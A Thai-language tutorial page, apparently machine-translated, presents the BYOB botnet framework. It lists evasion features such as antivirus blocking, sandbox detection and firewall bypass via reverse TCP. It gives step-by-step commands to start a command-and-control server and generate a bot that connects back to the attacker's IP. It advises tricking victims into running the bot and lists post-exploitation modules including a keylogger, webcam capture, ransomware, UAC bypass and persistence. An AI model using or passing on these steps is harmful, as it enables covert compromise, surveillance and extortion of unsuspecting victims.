home

หน้าแรก
 Computer >> คอมพิวเตอร์ >  >> การเขียนโปรแกรม >> Python

สร้างบ็อตเน็ตของคุณเอง

BYOB จัดเตรียมกรอบงานสำหรับนักวิจัยด้านความปลอดภัยและนักพัฒนาเพื่อสร้างและใช้งานบ็อตเน็ตพื้นฐานเพื่อให้เข้าใจถึงมัลแวร์ที่ซับซ้อนซึ่งแพร่ระบาดในอุปกรณ์หลายล้านเครื่องทุกปี และวางบอทเน็ตสมัยใหม่ เพื่อปรับปรุงความสามารถในการพัฒนามาตรการตอบโต้กับภัยคุกคามเหล่านี้ ได้รับการออกแบบมาเพื่อให้นักพัฒนาสามารถใช้โค้ดของตนเองและเพิ่มคุณสมบัติใหม่ที่ยอดเยี่ยมโดยไม่ต้องเขียน RAT หรือเซิร์ฟเวอร์ Command &Control ใหม่ทั้งหมด

คุณสมบัติ

  • ไม่มีอะไรเขียนลงดิสก์ − ไคลเอ็นต์ไม่เคยเขียนอะไรลงในดิสก์ แม้แต่ไฟล์ชั่วคราวเพราะการนำเข้าจากระยะไกลทำให้โค้ดที่กำหนดเองโหลดเข้าสู่หน่วยความจำแบบไดนามิกและนำเข้าโดยตรงไปยังกระบวนการที่กำลังทำงานอยู่

  • แพลตฟอร์มอิสระ − ทุกอย่างเขียนด้วย Python และไคลเอนต์ที่สร้างขึ้นสามารถเลือกที่จะคอมไพล์เป็นไฟล์ปฏิบัติการแบบพกพา (Windows) หรือรวมเป็นแอปพลิเคชันแบบสแตนด์อโลนได้

  • บายพาสไฟร์วอลล์ - ไคลเอนต์เชื่อมต่อกับเซิร์ฟเวอร์คำสั่งและการควบคุมผ่านการเชื่อมต่อ TCP ย้อนกลับ ซึ่งจะข้ามไฟร์วอลล์ส่วนใหญ่เนื่องจากการกำหนดค่าตัวกรองเริ่มต้นจะบล็อกการเชื่อมต่อขาเข้าเป็นหลัก

  • มาตรการต่อต้านโปรแกรมป้องกันไวรัส − หลีกเลี่ยงการถูกวิเคราะห์โดยโปรแกรมป้องกันไวรัสโดยบล็อกกระบวนการที่มีชื่อผลิตภัณฑ์ป้องกันไวรัสที่รู้จักไม่ให้วางไข่

  • เข้ารหัสเพย์โหลดเพื่อป้องกันการวิเคราะห์ - เพย์โหลดของไคลเอ็นต์หลักถูกเข้ารหัสด้วยคีย์ 256 บิตแบบสุ่มซึ่งมีอยู่ในสเตจของเพย์โหลดซึ่งสร้างขึ้นพร้อมกับมันเท่านั้น

  • ป้องกันวิศวกรรมย้อนกลับ − โดยค่าเริ่มต้น ไคลเอนต์จะยกเลิกการดำเนินการหากตรวจพบเครื่องเสมือนหรือแซนด์บ็อกซ์

วิธีการติดตั้ง

  • โคลน git https://github.com/malwaredllc/byob.git

  • cd byob

  • pip install -r requirements.txt

  • หลาม setup.py

    ที่นี่จะใช้อาคารผู้โดยสารสองแห่ง เทอร์มินัลแรกจะเป็น Bot Server ซึ่งจะมีการจัดการเซสชันและเทอร์มินัลที่สองคือ Bot Client ที่จะสร้างบอท

  • python server.py –port 445

    จากนั้นเปิดเทอร์มินัล linux อื่นแล้วพิมพ์ cd /home/cybersecurity/Downloads/byob/byob

  • หลาม client.py –name testbot.py 192.168.1.10 (ไอพีของผู้โจมตี) 445

หลังจากดำเนินการค้นหาข้างต้น บ็อตเน็ตใหม่จะถูกสร้างขึ้น แบบสอบถามข้างต้นจะดำเนินการ ตอนนี้คุณสามารถใช้กลอุบายทางสังคมที่ใคร ๆ ก็เปิดบอทในคอมพิวเตอร์ของตนได้ เมื่อ testbot.py ดำเนินการในเครื่องเป้าหมาย เซสชันจะถูกสร้างขึ้นในเซิร์ฟเวอร์ botnet

หลังการเอารัดเอาเปรียบ

โมดูลหลังการใช้ประโยชน์ที่ลูกค้าสามารถนำเข้าจากระยะไกลได้หลังจากการกำหนดค่าบ็อตเน็ตในเหยื่อสำเร็จแล้ว

  • Keylogger (byob.modules.keylogger):บันทึกการกดแป้นของผู้ใช้และชื่อหน้าต่างที่ป้อน

  • สกรีนช็อต (byob.modules.screenshot):ถ่ายภาพหน้าจอของเดสก์ท็อปของผู้ใช้ปัจจุบัน

  • เว็บแคม (byob.modules.webcam):ดูสตรีมแบบสดหรือจับภาพ/วิดีโอจากเว็บแคม

  • ค่าไถ่ (byob.modules.ransom):เข้ารหัสไฟล์และสร้างกระเป๋าสตางค์ BTC แบบสุ่มสำหรับการชำระค่าไถ่

  • Packet Sniffer (byob.modules.packetsniffer):เรียกใช้ packet sniffer บนเครือข่ายโฮสต์ &ไฟล์ upload.pcap

  • ความคงอยู่ (byob.modules.persistence):สร้างการคงอยู่ของเครื่องโฮสต์

  • โทรศัพท์ (byob.modules.phone):อ่าน/ค้นหา/อัปโหลดข้อความจากสมาร์ทโฟนไคลเอ็นต์

  • ยกระดับสิทธิ์ (byob.modules.escalate):พยายามเลี่ยงผ่าน UAC เพื่อรับสิทธิ์ผู้ดูแลระบบที่ไม่ได้รับอนุญาต

  • Port Scanner (byob.modules.portscanner):สแกนเครือข่ายท้องถิ่นสำหรับอุปกรณ์ออนไลน์อื่นๆ &เปิดพอร์ต

  • การควบคุมกระบวนการ (byob.modules.process):list/search/kill/monitor กำลังเรียกใช้กระบวนการบนโฮสต์